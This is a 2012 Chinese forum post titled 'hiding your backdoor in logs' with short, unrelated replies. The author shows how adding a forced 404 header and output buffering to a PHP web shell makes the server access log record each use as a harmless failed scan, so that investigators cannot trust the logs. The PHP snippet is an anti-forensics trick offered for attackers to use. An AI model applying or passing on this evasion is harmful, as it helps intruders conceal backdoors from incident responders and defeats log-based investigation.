在日志中隐藏自己后门

admin · 发表于 2012-10-24 04:52:28

以前发现的一个技巧性的东西，由于一般的webserver都会记录日志，而且在目前的后期后门以及漏洞追踪中主要的证据都是日志，如果有可能让日志变得不可信，我们就有可能成功了。

访问shell.php，会得到日志：

<?phpphpinfo(); ?>127.0.0.1 - - [20/Oct/2012:22:21:54 +0800] "GET /shell.php HTTP/1.1" 200 66918

稍微改变下后门，添加header一句代码之后就会是

<?phpheader('HTTP/1.1 404'); ob_start(); phpinfo(); ob_end_clean(); ?>127.0.0.1 - - [20/Oct/2012:22:21:54 +0800] "GET /shell.php HTTP/1.1" 404 -

标准的一次扫描结果，它无法说明任何问题了

：）

囡囡 · 发表于 2012-10-25 02:54:31

水至清则无鱼,人至贱则无敌!

unu5 · 发表于 2012-10-25 07:48:46

我帮你喝喝

af118406 · 发表于 2012-10-25 09:57:24

原来是这样

douya · 发表于 2012-10-27 05:42:10

水至清则无鱼,人至贱则无敌!

去去去 · 发表于 2012-10-27 05:52:09

呵呵，找个机会...

469980995 · 发表于 2012-10-27 08:53:19

琴棋书画不会，洗衣做饭嫌累。

0511ns.com · 发表于 2012-10-27 10:52:42

顶你一下，好贴要顶！

火烧沙巴克 · 发表于 2012-10-27 14:55:15

楼上的话等于没说~~~

永远保持^_^ · 发表于 2012-10-28 15:12:41

我帮你喝喝